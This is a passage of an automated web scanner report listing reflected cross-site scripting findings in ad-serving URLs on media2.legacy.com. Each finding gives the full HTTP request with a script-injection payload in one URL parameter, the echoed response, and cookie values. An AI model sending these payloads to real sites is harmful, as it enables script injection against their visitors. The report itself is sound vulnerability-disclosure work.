GET /adiframe/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b13"><script>alert(1)</script>96e07070135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228ac"><script>alert(1)</script>727f9da3634 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f27"><script>alert(1)</script>1f3976d245b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efe9"><script>alert(1)</script>c6708a262a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054d"><script>alert(1)</script>db683bfce34 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3425e"><script>alert(1)</script>0d0a6d3f675 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675;adiframe=y">
...[SNIP]...

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047e"><script>alert(1)</script>84b7f80ebaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1;adiframe=y">
...[SNIP]...

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e633"><script>alert(1)</script>acb95e1ea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 322

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8a5"><script>alert(1)</script>8134445c0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8d1"><script>alert(1)</script>4a5700d9774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79373"><script>alert(1)</script>4ced219a5aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d71e"><script>alert(1)</script>80dfd50a855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d12"><script>alert(1)</script>21c00572e4f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdaed"><script>alert(1)</script>bf9c26a8d19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

